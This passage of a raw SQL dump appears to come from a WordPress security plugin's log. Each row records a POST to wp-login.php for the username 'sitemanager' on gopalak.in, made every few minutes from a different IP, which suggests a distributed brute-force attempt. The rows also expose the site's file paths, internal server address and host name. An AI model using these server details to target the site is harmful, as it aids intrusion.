QUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745569572.673099;s:12:\"REQUEST_TIME\";i:1745569572;}}','68.65.122.55',0,'2025-04-25 13:56:14','1970-01-01 00:00:00'),(94286,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56410\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.172.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745570484.4857471;s:12:\"REQUEST_TIME\";i:1745570484;}}','103.161.172.148',0,'2025-04-25 14:11:26','1970-01-01 00:00:00'),(94287,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60384\";s:11:\"REMOTE_ADDR\";s:14:\"194.67.121.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745570936.3216109;s:12:\"REQUEST_TIME\";i:1745570936;}}','194.67.121.219',0,'2025-04-25 14:18:58','1970-01-01 00:00:00'),(94288,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34012\";s:11:\"REMOTE_ADDR\";s:13:\"91.121.44.198\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745571386.874887;s:12:\"REQUEST_TIME\";i:1745571386;}}','91.121.44.198',0,'2025-04-25 14:26:28','1970-01-01 00:00:00'),(94289,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50618\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745571829.4042909;s:12:\"REQUEST_TIME\";i:1745571829;}}','163.61.72.36',0,'2025-04-25 14:33:51','1970-01-01 00:00:00'),(94290,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40504\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745572276.755336;s:12:\"REQUEST_TIME\";i:1745572276;}}','54.39.48.216',0,'2025-04-25 14:41:18','1970-01-01 00:00:00'),(94291,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46420\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745572723.7428789;s:12:\"REQUEST_TIME\";i:1745572723;}}','66.102.128.22',0,'2025-04-25 14:48:45','1970-01-01 00:00:00'),(94292,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43822\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.34\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745573166.1373019;s:12:\"REQUEST_TIME\";i:1745573166;}}','68.65.123.34',0,'2025-04-25 14:56:08','1970-01-01 00:00:00'),(94293,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52658\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745573600.456682;s:12:\"REQUEST_TIME\";i:1745573600;}}','78.155.192.110',0,'2025-04-25 15:03:22','1970-01-01 00:00:00'),(94294,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54416\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745574037.8705139;s:12:\"REQUEST_TIME\";i:1745574037;}}','66.29.137.63',0,'2025-04-25 15:10:39','1970-01-01 00:00:00'),(94295,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52492\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745574465.173162;s:12:\"REQUEST_TIME\";i:1745574465;}}','162.0.235.8',0,'2025-04-25 15:17:47','1970-01-01 00:00:00'),(94296,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 